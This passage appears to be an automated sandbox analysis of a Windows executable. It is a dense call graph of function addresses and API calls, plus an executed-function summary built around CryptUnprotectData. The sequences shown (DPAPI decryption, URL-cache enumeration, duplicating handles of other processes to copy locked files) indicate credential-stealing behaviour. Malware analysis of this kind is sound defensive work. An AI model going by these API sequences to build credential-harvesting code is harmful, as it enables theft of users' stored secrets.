38795->38798 38799 40b89a 38796->38799 38800 40b04b ??3@YAXPAX 38797->38800 38798->38797 38801 438552 134 API calls 38799->38801 38802 40baf3 38800->38802 38803 40b8a4 38801->38803 38802->38356 38804 40bacd 38803->38804 38806 4251c4 137 API calls 38803->38806 38805 443d90 111 API calls 38804->38805 38805->38795 38829 40b8b8 38806->38829 38807 40bac6 39867 424f26 123 API calls 38807->39867 38808 40b8bd memset 39858 425413 17 API calls 38808->39858 38811 425413 17 API calls 38811->38829 38814 40a71b MultiByteToWideChar 38814->38829 38815 40a734 MultiByteToWideChar 38815->38829 38818 40b9b5 memcmp 38818->38829 38819 4099c6 2 API calls 38819->38829 38820 404423 38 API calls 38820->38829 38823 40bb3e memset memcpy 39868 40a734 MultiByteToWideChar 38823->39868 38824 4251c4 137 API calls 38824->38829 38826 40bb88 LocalFree 38826->38829 38829->38807 38829->38808 38829->38811 38829->38814 38829->38815 38829->38818 38829->38819 38829->38820 38829->38823 38829->38824 38830 40ba5f memcmp 38829->38830 39859 4253ef 16 API calls 38829->39859 39860 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38829->39860 39861 4253af 17 API calls 38829->39861 39862 4253cf 17 API calls 38829->39862 39863 447280 memset 38829->39863 39864 447960 memset memcpy memcpy memcpy 38829->39864 39865 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38829->39865 39866 447920 memcpy memcpy memcpy 38829->39866 38830->38829 38831->38358 38833 40aed1 38832->38833 38834 40aec7 FindClose 38832->38834 38833->38290 38834->38833 38836 4099d7 38835->38836 38837 4099da memcpy 38835->38837 38836->38837 38837->38341 38839 40b2cc 27 API calls 38838->38839 38840 44543f 38839->38840 38841 409d1f 6 API calls 38840->38841 38842 44544f 38841->38842 39952 409b98 GetFileAttributesW 38842->39952 38844 44545e 38845 445476 38844->38845 38846 40b6ef 253 API calls 38844->38846 38847 40b2cc 27 API calls 38845->38847 38846->38845 38848 445482 38847->38848 38849 409d1f 6 API calls 38848->38849 38850 445492 38849->38850 39953 409b98 GetFileAttributesW 38850->39953 38852 4454a1 38853 4454b9 38852->38853 38854 40b6ef 253 API calls 38852->38854 38853->38371 38854->38853 38855->38370 38856->38387 38857->38393 38858->38430 38859->38408 38860->38457 38861->38457 38862->38438 38863->38468 38864->38470 38865->38472 38867 414c2e 17 API calls 38866->38867 38868 40c2ae 38867->38868 38938 40c1d3 38868->38938 38873 40c3be 38890 40a8ab 38873->38890 38874 40afcf 2 API calls 38875 40c2fd FindFirstUrlCacheEntryW 38874->38875 38876 40c3b6 38875->38876 38877 40c31e wcschr 38875->38877 38878 40b04b ??3@YAXPAX 38876->38878 38879 40c331 38877->38879 38880 40c35e FindNextUrlCacheEntryW 38877->38880 38878->38873 38882 40a8ab 9 API calls 38879->38882 38880->38877 38881 40c373 GetLastError 38880->38881 38883 40c3ad FindCloseUrlCache 38881->38883 38884 40c37e 38881->38884 38885 40c33e wcschr 38882->38885 38883->38876 38886 40afcf 2 API calls 38884->38886 38885->38880 38887 40c34f 38885->38887 38888 40c391 FindNextUrlCacheEntryW 38886->38888 38889 40a8ab 9 API calls 38887->38889 38888->38877 38888->38883 38889->38880 39127 40a97a 38890->39127 38893 40a8cc 38893->38479 38894 40a8d0 7 API calls 38894->38893 39132 40b1ab free free 38895->39132 38897 40c3dd 38898 40b2cc 27 API calls 38897->38898 38899 40c3e7 38898->38899 39133 414592 RegOpenKeyExW 38899->39133 38901 40c3f4 38902 40c50e 38901->38902 38903 40c3ff 38901->38903 38917 405337 38902->38917 38904 40a9ce 4 API calls 38903->38904 38905 40c418 memset 38904->38905 39134 40aa1d 38905->39134 38908 40c471 38910 40c47a _wcsupr 38908->38910 38909 40c505 RegCloseKey 38909->38902 38911 40a8d0 7 API calls 38910->38911 38912 40c498 38911->38912 38913 40a8d0 7 API calls 38912->38913 38914 40c4ac memset 38913->38914 38915 40aa1d 38914->38915 38916 40c4e4 RegEnumValueW 38915->38916 38916->38909 38916->38910 39136 405220 38917->39136 38921 4099c6 2 API calls 38920->38921 38922 40a714 _wcslwr 38921->38922 38923 40c634 38922->38923 39193 405361 38923->39193 38926 40c65c wcslen 39196 4053b6 39 API calls 38926->39196 38927 40c71d wcslen 38927->38493 38929 40c677 38930 40c713 38929->38930 39197 40538b 39 API calls 38929->39197 39199 4053df 39 API calls 38930->39199 38933 40c6a5 38933->38930 38934 40c6a9 memset 38933->38934 38935 40c6d3 38934->38935 39198 40c589 44 API calls 38935->39198 38937->38486 38939 40ae18 9 API calls 38938->38939 38945 40c210 38939->38945 38940 40ae51 9 API calls 38940->38945 38941 40c264 38942 40aebe FindClose 38941->38942 38944 40c26f 38942->38944 38943 40add4 2 API calls 38943->38945 38950 40e5ed memset memset 38944->38950 38945->38940 38945->38941 38945->38943 38946 40c231 _wcsicmp 38945->38946 38947 40c1d3 35 API calls 38945->38947 38946->38945 38948 40c248 38946->38948 38947->38945 38963 40c084 22 API calls 38948->38963 38951 414c2e 17 API calls 38950->38951 38952 40e63f 38951->38952 38953 409d1f 6 API calls 38952->38953 38954 40e658 38953->38954 38964 409b98 GetFileAttributesW 38954->38964 38956 40e667 38957 40e680 38956->38957 38958 409d1f 6 API calls 38956->38958 38965 409b98 GetFileAttributesW 38957->38965 38958->38957 38960 40e68f 38961 40c2d8 38960->38961 38966 40e4b2 38960->38966 38961->38873 38961->38874 38963->38945 38964->38956 38965->38960 38987 40e01e 38966->38987 38968 40e593 38969 40e5b0 38968->38969 38970 40e59c DeleteFileW 38968->38970 38971 40b04b ??3@YAXPAX 38969->38971 38970->38969 38973 40e5bb 38971->38973 38972 40e521 38972->38968 39010 40e175 38972->39010 38975 40e5c4 CloseHandle 38973->38975 38976 40e5cc 38973->38976 38975->38976 38978 40b633 free 38976->38978 38977 40e573 38979 40e584 38977->38979 38980 40e57c CloseHandle 38977->38980 38981 40e5db 38978->38981 39053 40b1ab free free 38979->39053 38980->38979 38984 40b633 free 38981->38984 38983 40e540 38983->38977 39030 40e2ab 38983->39030 38985 40e5e3 38984->38985 38985->38961 39054 406214 38987->39054 38990 40e16b 38990->38972 38993 40afcf 2 API calls 38994 40e08d OpenProcess 38993->38994 38995 40e0a4 GetCurrentProcess DuplicateHandle 38994->38995 38999 40e152 38994->38999 38996 40e0d0 GetFileSize 38995->38996 38997 40e14a CloseHandle 38995->38997 39090 409a45 GetTempPathW 38996->39090 38997->38999 38998 40e160 39002 40b04b ??3@YAXPAX 38998->39002 38999->38998 39001 406214 22 API calls 38999->39001 39001->38998 39002->38990 39003 40e0ea 39093 4096dc CreateFileW 39003->39093 39005 40e0f1 CreateFileMappingW 39006 40e140 CloseHandle CloseHandle 39005->39006 39007 40e10b MapViewOfFile 39005->39007 39006->38997 39008 40e13b CloseHandle 39007->39008 39009 40e11f WriteFile UnmapViewOfFile 39007->39009 39008->39006 39009->39008 39011 40e18c 39010->39011 39094 406b90 39011->39094 39014 40e1a7 memset 39020 40e1e8 39014->39020 39015 40e299 39104 4069a3 39015->39104 39021 40e283 39020->39021 39022 40dd50 _wcsicmp 39020->39022 39028 40e244 _snwprintf 39020->39028 39111 406e8f 13 API calls 39020->39111 39112 40742e 8 API calls 39020->39112 39113 40aae3 wcslen wcslen _memicmp 39020->39113 39114 406b53 SetFilePointerEx ReadFile 39020->39114 39023 40e291 39021->39023 39024 40e288 free 39021->39024 39022->39020 39025 40aa04 free 39023->39025 39024->39023 39025->39015 39029 40a8d0 7 API calls 39028->39029 39029->39020 39031 40e2c2 39030->39031 39032 406b90 11 API calls 39031->39032 39038 40e2d3 39032->39038 39033 40e4a0 39034 4069a3 2 API calls 39033->39034 39036 40e4ab 39034->39036 39036->38983 39038->39033 39039 40e489 39038->39039 39042 40dd50 _wcsicmp 39038->39042 39048 40e3e0 memcpy 39038->39048 39049 40e3fb memcpy 39038->39049 39050 40e3b3 wcschr 39038->39050 39051 40e416 memcpy 39038->39051 39052 40e431 memcpy 39038->39052 39115 406e8f 13 API calls 39038->39115 39116 40dd50 _wcsicmp 39038->39116 39125 40742e 8 API calls 39038->39125 39126 406b53 SetFilePointerEx ReadFile 39038->39126 39040 40aa04 free 39039->39040 39041 40e491 39040->39041 39041->39033 39043 40e497 free 39041->39043 39042->39038 39043->39033 39045 40e376 memset 39117 40aa29 39045->39117 39048->39038 39049->39038 39050->39038 39051->39038 39052->39038 39053->38968 39055 406294 CloseHandle 39054->39055 39056 406224 39055->39056 39057 4096c3 CreateFileW 39056->39057 39058 40622d 39057->39058 39059 406281 GetLastError 39058->39059 39060 40a2ef ReadFile 39058->39060 39064 40625a 39059->39064 39061 406244 39060->39061 39061->39059 39062 40624b 39061->39062 39063 406777 19 API calls 39062->39063 39062->39064 39063->39064 39064->38990 39065 40dd85 memset 39064->39065 39066 409bca GetModuleFileNameW 39065->39066 39067 40ddbe CreateFileW 39066->39067 39070 40ddf1 39067->39070 39068 40afcf ??2@YAPAXI ??3@YAXPAX 39068->39070 39069 41352f 9 API calls 39069->39070 39070->39068 39070->39069 39071 40de0b NtQuerySystemInformation 39070->39071 39072 40de3b CloseHandle GetCurrentProcessId 39070->39072 39071->39070 39073 40de54 39072->39073 39074 413d4c 46 API calls 39073->39074 39082 40de88 39074->39082 39075 40e00c 39076 413d29 free FreeLibrary 39075->39076 39077 40e014 39076->39077 39077->38990 39077->38993 39078 40dea9 _wcsicmp 39079 40dee7 OpenProcess 39078->39079 39080 40debd _wcsicmp 39078->39080 39079->39082 39080->39079 39081 40ded0 _wcsicmp 39080->39081 39081->39079 39081->39082 39082->39075 39082->39078 39083 40dfef CloseHandle 39082->39083 39084 40df78 39082->39084 39085 40df23 GetCurrentProcess DuplicateHandle 39082->39085 39088 40df8f CloseHandle 39082->39088 39083->39082 39084->39083 39084->39088 39089 40dfae _wcsicmp 39084->39089 39085->39082 39086 40df4c memset 39085->39086 39087 41352f 9 API calls 39086->39087 39087->39082 39088->39084 39089->39082 39089->39084 39091 409a74 GetTempFileNameW 39090->39091 39092 409a66 GetWindowsDirectoryW 39090->39092 39091->39003 39092->39091 39093->39005 39095 406bd5 39094->39095 39096 406bad 39094->39096 39098 4066bf free malloc memcpy free free 39095->39098 39103 406c0f 39095->39103 39096->39095 39097 406bba _wcsicmp 39096->39097 39097->39095 39097->39096 39099 406be5 39098->39099 39100 40afcf ??2@YAPAXI ??3@YAXPAX 39099->39100 39099->39103 39101 406bff 39100->39101 39102 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39101->39102 39102->39103 39103->39014 39103->39015 39105 4069c4 ??3@YAXPAX 39104->39105 39106 4069af 39105->39106 39107 40b633 free 39106->39107 39108 4069ba 39107->39108 39109 40b04b ??3@YAXPAX 39108->39109 39110 4069c2 39109->39110 39110->38983 39111->39020 39112->39020 39113->39020 39114->39020 39115->39038 39116->39045 39118 40aa33 39117->39118 39119 40aa63 39117->39119 39120 40aa44 39118->39120 39121 40aa38 wcslen 39118->39121 39119->39038 39122 40a9ce malloc memcpy free free 39120->39122 39121->39120 39123 40aa4d 39122->39123 39123->39119 39124 40aa51 memcpy 39123->39124 39124->39119 39125->39038 39126->39038 39128 40a980 39127->39128 39129 40a8bb 39128->39129 39130 40a995 _wcsicmp 39128->39130 39131 40a99c wcscmp 39128->39131 39129->38893 39129->38894 39130->39128 39131->39128 39132->38897 39133->38901 39135 40aa23 RegEnumValueW 39134->39135 39135->38908 39135->38909 39137 405335 39136->39137 39138 40522a 39136->39138 39137->38493 39139 40b2cc 27 API calls 39138->39139 39140 405234 39139->39140 39141 40a804 8 API calls 39140->39141 39142 40523a 39141->39142 39181 40b273 39142->39181 39144 405248 _mbscpy _mbscat GetProcAddress 39145 40b273 27 API calls 39144->39145 39146 405279 39145->39146 39184 405211 GetProcAddress 39146->39184 39148 405282 39149 40b273 27 API calls 39148->39149 39150 40528f 39149->39150 39185 405211 GetProcAddress 39150->39185 39152 405298 39153 40b273 27 API calls 39152->39153 39154 4052a5 39153->39154 39186 405211 GetProcAddress 39154->39186 39156 4052ae 39157 40b273 27 API calls 39156->39157 39158 4052bb 39157->39158 39187 405211 GetProcAddress 39158->39187 39160 4052c4 39161 40b273 27 API calls 39160->39161 39162 4052d1 39161->39162 39188 405211 GetProcAddress 39162->39188 39164 4052da 39165 40b273 27 API calls 39164->39165 39166 4052e7 39165->39166 39189 405211 GetProcAddress 39166->39189 39168 4052f0 39169 40b273 27 API calls 39168->39169 39170 4052fd 39169->39170 39190 405211 GetProcAddress 39170->39190 39172 405306 39173 40b273 27 API calls 39172->39173 39174 405313 39173->39174 39191 405211 GetProcAddress 39174->39191 39176 40531c 39177 40b273 27 API calls 39176->39177 39178 405329 39177->39178 39192 405211 GetProcAddress 39178->39192 39180 405332 39180->39137 39182 40b58d 27 API calls 39181->39182 39183 40b18c 39182->39183 39183->39144 39184->39148 39185->39152 39186->39156 39187->39160 39188->39164 39189->39168 39190->39172 39191->39176 39192->39180 39194 405220 39 API calls 39193->39194 39195 405369 39194->39195 39195->38926 39195->38927 39196->38929 39197->38933 39198->38930 39199->38927 39201 40440c FreeLibrary 39200->39201 39202 40436d 39201->39202 39203 40a804 8 API calls 39202->39203 39204 404377 39203->39204 39205 404383 39204->39205 39206 404405 39204->39206 39207 40b273 27 API calls 39205->39207 39206->38498 39206->38499 39206->38500 39208 40438d GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4043a7 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4043ba GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 4043ce GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4043e2 GetProcAddress 39215->39216 39217 4043f1 39216->39217 39218 4043f7 39217->39218 39219 40440c FreeLibrary 39217->39219 39218->39206 39219->39206 39221 404413 FreeLibrary 39220->39221 39222 40441e 39220->39222 39221->39222 39222->38515 39223->38511 39225 40447e 39224->39225 39226 40442e 39224->39226 39227 404485 CryptUnprotectData 39225->39227 39228 40449c 39225->39228 39229 40b2cc 27 API calls 39226->39229 39227->39228 39228->38511 39230 404438 39229->39230 39231 40a804 8 API calls 39230->39231 39232 40443e 39231->39232 39233 404445 39232->39233 39234 404467 39232->39234 39235 40b273 27 API calls 39233->39235 39234->39225 39237 404475 FreeLibrary 39234->39237 39236 40444f GetProcAddress 39235->39236 39236->39234 39238 404460 39236->39238 39237->39225 39238->39234 39240 4135f6 39239->39240 39241 4135eb FreeLibrary 39239->39241 39240->38518 39241->39240 39243 4449c4 39242->39243 39244 444a52 39242->39244 39245 40b2cc 27 API calls 39243->39245 39244->38535 39244->38536 39246 4449cb 39245->39246 39247 40a804 8 API calls 39246->39247 39248 4449d1 39247->39248 39249 40b273 27 API calls 39248->39249 39250 4449dc GetProcAddress 39249->39250 39251 40b273 27 API calls 39250->39251 39252 4449f3 GetProcAddress 39251->39252 39253 40b273 27 API calls 39252->39253 39254 444a04 GetProcAddress 39253->39254 39255 40b273 27 API calls 39254->39255 39256 444a15 GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 444a26 GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 444a37 GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 444a48 GetProcAddress 39261->39262 39262->39244 39263->38546 39264->38546 39265->38546 39266->38546 39267->38537 39269 403a29 39268->39269 39283 403bed memset memset 39269->39283 39271 403ae7 39296 40b1ab free free 39271->39296 39273 403a3f memset 39277 403a2f 39273->39277 39274 403aef 39274->38554 39275 40a8d0 7 API calls 39275->39277 39276 409d1f 6 API calls 39276->39277 39277->39271 39277->39273 39277->39275 39277->39276 39278 409b98 GetFileAttributesW 39277->39278 39278->39277 39280 40a051 GetFileTime CloseHandle 39279->39280 39281 4039ca CompareFileTime 39279->39281 39280->39281 39281->38554 39282->38553 39284 414c2e 17 API calls 39283->39284 39285 403c38 39284->39285 39286 409719 2 API calls 39285->39286 39287 403c3f wcscat 39286->39287 39288 414c2e 17 API calls 39287->39288 39289 403c61 39288->39289 39290 409719 2 API calls 39289->39290 39291 403c68 wcscat 39290->39291 39297 403af5 39291->39297 39294 403af5 20 API calls 39295 403c95 39294->39295 39295->39277 39296->39274 39298 403b02 39297->39298 39299 40ae18 9 API calls 39298->39299 39307 403b37 39299->39307 39300 403bdb 39301 40aebe FindClose 39300->39301 39303 403be6 39301->39303 39302 40add4 wcscmp wcscmp 39302->39307 39303->39294 39304 40ae18 9 API calls 39304->39307 39305 40ae51 9 API calls 39305->39307 39306 40aebe FindClose 39306->39307 39307->39300 39307->39302 39307->39304 39307->39305 39307->39306 39308 40a8d0 7 API calls 39307->39308 39308->39307 39310 409d1f 6 API calls 39309->39310 39311 404190 39310->39311 39324 409b98 GetFileAttributesW 39311->39324 39313 40419c 39314 4041a7 6 API calls 39313->39314 39315 40435c 39313->39315 39317 40424f 39314->39317 39315->38580 39317->39315 39318 40425e memset 39317->39318 39320 409d1f 6 API calls 39317->39320 39321 40a8ab 9 API calls 39317->39321 39325 414842 39317->39325 39318->39317 39319 404296 wcscpy 39318->39319 39319->39317 39320->39317 39322 4042b6 memset memset _snwprintf wcscpy 39321->39322 39322->39317 39323->38578 39324->39313 39328 41443e 39325->39328 39327 414866 39327->39317 39329 41444b 39328->39329 39330 414451 39329->39330 39331 4144a3 GetPrivateProfileStringW 39329->39331 39332 414491 39330->39332 39333 414455 wcschr 39330->39333 39331->39327 39335 414495 WritePrivateProfileStringW 39332->39335 39333->39332 39334 414463 _snwprintf 39333->39334 39334->39335 39335->39327 39336->38584 39338 40b2cc 27 API calls 39337->39338 39339 409615 39338->39339 39340 409d1f 6 API calls 39339->39340 39341 409625 39340->39341 39366 409b98 GetFileAttributesW 39341->39366 39343 409634 39344 409648 39343->39344 39367 4091b8 memset 39343->39367 39346 40b2cc 27 API calls 39344->39346 39349 408801 39344->39349 39347 40965d 39346->39347 39348 409d1f 6 API calls 39347->39348 39350 40966d 39348->39350 39349->38587 39349->38614 39419 409b98 GetFileAttributesW 39350->39419 39352 40967c 39352->39349 39353 409681 39352->39353 39420 409529 72 API calls 39353->39420 39355 409690 39355->39349 39356->38609 39366->39343 39421 40a6e6 WideCharToMultiByte 39367->39421 39369 409202 39422 444432 39369->39422 39372 40b273 27 API calls 39373 409236 39372->39373 39468 438552 39373->39468 39376 409383 39378 40b273 27 API calls 39376->39378 39379 409399 39378->39379 39382 438552 134 API calls 39379->39382 39400 4093a3 39382->39400 39386 4094ff 39389 4251c4 137 API calls 39389->39400 39393 4093df 39496 424f26 123 API calls 39393->39496 39395 4253cf 17 API calls 39395->39400 39399 40951d 39399->39344 39400->39386 39400->39389 39400->39393 39400->39395 39403 4093e4 39400->39403 39494 4253af 17 API calls 39403->39494 39419->39352 39420->39355 39421->39369 39518 4438b5 39422->39518 39424 44444c 39425 409215 39424->39425 39532 415a6d 39424->39532 39425->39372 39425->39399 39427 4442e6 11 API calls 39429 44469e 39427->39429 39428 444486 39430 4444b9 memcpy 39428->39430 39467 4444a4 39428->39467 39429->39425 39432 443d90 111 API calls 39429->39432 39536 415258 39430->39536 39432->39425 39433 444524 39434 444541 39433->39434 39435 44452a 39433->39435 39539 444316 39434->39539 39436 416935 16 API calls 39435->39436 39436->39467 39439 444316 18 API calls 39440 444563 39439->39440 39441 444316 18 API calls 39440->39441 39442 44456f 39441->39442 39467->39427 39657 438460 39468->39657 39470 409240 39470->39376 39471 4251c4 39470->39471 39708 424f07 39471->39708 39473 4251e4 39474 4251f7 39473->39474 39475 4251e8 39473->39475 39496->39386 39519 4438d0 39518->39519 39529 4438c9 39518->39529 39606 415378 memcpy memcpy 39519->39606 39529->39424 39533 415a77 39532->39533 39534 415a8d 39533->39534 39535 415a7e memset 39533->39535 39534->39428 39535->39534 39537 4438b5 11 API calls 39536->39537 39538 41525d 39537->39538 39538->39433 39540 444328 39539->39540 39541 444423 39540->39541 39542 44434e 39540->39542 39607 4446ea 11 API calls 39541->39607 39543 432d4e 3 API calls 39542->39543 39545 44435a 39543->39545 39547 444375 39545->39547 39552 44438b 39545->39552 39546 432d4e 3 API calls 39548 4443ec 39546->39548 39549 416935 16 API calls 39547->39549 39550 444381 39548->39550 39551 416935 16 API calls 39548->39551 39549->39550 39550->39439 39551->39550 39552->39546 39607->39550 39669 41703f 39657->39669 39659 43847a 39660 43848a 39659->39660 39661 43847e 39659->39661 39676 438270 39660->39676 39706 4446ea 11 API calls 39661->39706 39666 4384bb 39667 438270 134 API calls 39666->39667 39668 438488 39667->39668 39668->39470 39670 417044 39669->39670 39671 41705c 39669->39671 39673 416760 11 API calls 39670->39673 39675 417055 39670->39675 39672 417075 39671->39672 39674 41707a 11 API calls 39671->39674 39672->39659 39673->39675 39674->39670 39675->39659 39677 415a91 memset 39676->39677 39678 43828d 39677->39678 39679 438297 39678->39679 39680 438341 39678->39680 39682 4382d6 39678->39682 39681 415c7d 16 API calls 39679->39681 39683 44358f 19 API calls 39680->39683 39684 438458 39681->39684 39685 4382fb 39682->39685 39686 4382db 39682->39686 39696 438318 39683->39696 39684->39668 39707 424f26 123 API calls 39684->39707 39688 415c23 memcpy 39685->39688 39687 416935 16 API calls 39686->39687 39689 4382e9 39687->39689 39690 438305 39688->39690 39691 415c7d 16 API calls 39689->39691 39693 44358f 19 API calls 39690->39693 39690->39696 39691->39679 39692 438373 39695 438383 39692->39695 39697 4300e8 memset memset memcpy 39692->39697 39693->39696 39694 43819e 115 API calls 39694->39692 39698 4383cd 39695->39698 39700 415c23 memcpy 39695->39700 39696->39692 39696->39694 39697->39695 39700->39698 39706->39668 39707->39666 39709 424f1f 39708->39709 39710 424f0c 39708->39710 39729 424eea 11 API calls 39709->39729 39728 416760 11 API calls 39710->39728 39713 424f18 39713->39473 39714 424f24 39714->39473 39728->39713 39729->39714 39807 413f4f 39780->39807 39783 413f37 K32GetModuleFileNameExW 39784 413f4a 39783->39784 39784->38644 39786 413969 wcscpy 39785->39786 39787 41396c wcschr 39785->39787 39790 413a3a 39786->39790 39787->39786 39789 41398e 39787->39789 39812 4097f7 wcslen wcslen _memicmp 39789->39812 39790->38644 39792 41399a 39793 4139a4 memset 39792->39793 39794 4139e6 39792->39794 39813 409dd5 GetWindowsDirectoryW wcscpy 39793->39813 39796 413a31 wcscpy 39794->39796 39797 4139ec memset 39794->39797 39796->39790 39814 409dd5 GetWindowsDirectoryW wcscpy 39797->39814 39798 4139c9 wcscpy wcscat 39798->39790 39800 413a11 memcpy wcscat 39800->39790 39802 413cb0 GetModuleHandleW 39801->39802 39803 413cda 39801->39803 39802->39803 39806 413cbf GetProcAddress 39802->39806 39804 413ce3 GetProcessTimes 39803->39804 39805 413cf6 39803->39805 39804->38649 39805->38649 39806->39803 39808 413f2f 39807->39808 39809 413f54 39807->39809 39808->39783 39808->39784 39810 40a804 8 API calls 39809->39810 39811 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39810->39811 39811->39808 39812->39792 39813->39798 39814->39800 39815->38669 39816->38693 39818 409cf9 GetVersionExW 39817->39818 39819 409d0a 39817->39819 39818->39819 39819->38698 39819->38704 39820->38705 39821->38709 39822->38711 39823->38777 39825 40bba5 39824->39825 39869 40cc26 39825->39869 39828 40bd4b 39890 40cc0c 39828->39890 39833 40b2cc 27 API calls 39834 40bbef 39833->39834 39897 40ccf0 _wcsicmp 39834->39897 39836 40bbf5 39836->39828 39898 40ccb4 6 API calls 39836->39898 39838 40bc26 39839 40cf04 17 API calls 39838->39839 39840 40bc2e 39839->39840 39841 40bd43 39840->39841 39842 40b2cc 27 API calls 39840->39842 39843 40cc0c 4 API calls 39841->39843 39844 40bc40 39842->39844 39843->39828 39899 40ccf0 _wcsicmp 39844->39899 39846 40bc46 39846->39841 39847 40bc61 memset memset WideCharToMultiByte 39846->39847 39900 40103c strlen 39847->39900 39849 40bcc0 39850 40b273 27 API calls 39849->39850 39851 40bcd0 memcmp 39850->39851 39851->39841 39852 40bce2 39851->39852 39853 404423 38 API calls 39852->39853 39854 40bd10 39853->39854 39854->39841 39855 40bd3a LocalFree 39854->39855 39856 40bd1f memcpy 39854->39856 39855->39841 39856->39855 39857->38792 39858->38829 39859->38829 39860->38829 39861->38829 39862->38829 39863->38829 39864->38829 39865->38829 39866->38829 39867->38804 39868->38826 39901 4096c3 CreateFileW 39869->39901 39871 40cc34 39872 40cc3d GetFileSize 39871->39872 39880 40bbca 39871->39880 39873 40afcf 2 API calls 39872->39873 39874 40cc64 39873->39874 39902 40a2ef ReadFile 39874->39902 39876 40cc71 39903 40ab4a MultiByteToWideChar 39876->39903 39878 40cc95 CloseHandle 39879 40b04b ??3@YAXPAX 39878->39879 39879->39880 39880->39828 39881 40cf04 39880->39881 39882 40b633 free 39881->39882 39883 40cf14 39882->39883 39909 40b1ab free free 39883->39909 39885 40cf1b 39886 40cfef 39885->39886 39889 40bbdd 39885->39889 39910 40cd4b 39885->39910 39888 40cd4b 14 API calls 39886->39888 39888->39889 39889->39828 39889->39833 39891 40b633 free 39890->39891 39892 40cc15 39891->39892 39893 40aa04 free 39892->39893 39894 40cc1d 39893->39894 39951 40b1ab free free 39894->39951 39896 40b7d4 memset CreateFileW 39896->38784 39896->38785 39897->39836 39898->39838 39899->39846 39900->39849 39901->39871 39902->39876 39904 40ab93 39903->39904 39905 40ab6b 39903->39905 39904->39878 39906 40a9ce 4 API calls 39905->39906 39907 40ab74 39906->39907 39908 40ab7c MultiByteToWideChar 39907->39908 39908->39904 39909->39885 39911 40cd7b 39910->39911 39912 40aa29 6 API calls 39911->39912 39916 40cd89 39912->39916 39913 40cef5 39914 40aa04 free 39913->39914 39915 40cefd 39914->39915 39915->39885 39916->39913 39917 40aa29 6 API calls 39916->39917 39918 40ce1d 39917->39918 39919 40aa29 6 API calls 39918->39919 39920 40ce3e 39919->39920 39921 40ce6a 39920->39921 39944 40abb7 wcslen memmove 39920->39944 39922 40ce9f 39921->39922 39947 40abb7 wcslen memmove 39921->39947 39925 40a8d0 7 API calls 39922->39925 39928 40ceb5 39925->39928 39926 40ce56 39945 40aa71 wcslen 39926->39945 39927 40ce8b 39948 40aa71 wcslen 39927->39948 39932 40a8d0 7 API calls 39928->39932 39931 40ce5e 39946 40abb7 wcslen memmove 39931->39946 39935 40cecb 39932->39935 39933 40ce93 39949 40abb7 wcslen memmove 39933->39949 39950 40d00b malloc memcpy free free 39935->39950 39938 40cedd 39939 40aa04 free 39938->39939 39940 40cee5 39939->39940 39941 40aa04 free 39940->39941 39942 40ceed 39941->39942 39943 40aa04 free 39942->39943 39943->39913 39944->39926 39945->39931 39946->39921 39947->39927 39948->39933 39949->39922 39950->39938 39951->39896 39952->38844 39953->38852 40449 441819 40452 430737 40449->40452 40451 441825 40453 430756 40452->40453 40465 43076d 40452->40465 40454 430774 40453->40454 40455 43075f 40453->40455 40467 43034a memcpy 40454->40467 40466 4169a7 11 API calls 40455->40466 40458 4307ce 40460 430819 memset 40458->40460 40468 415b2c 11 API calls 40458->40468 40459 43077e 40459->40458 40463 4307fa 40459->40463 40459->40465 40460->40465 40462 4307e9 40462->40460 40462->40465 40469 4169a7 11 API calls 40463->40469 40465->40451 40466->40465 40467->40459 40468->40462 40469->40465 40470 41493c EnumResourceNamesW

                                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                                              Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
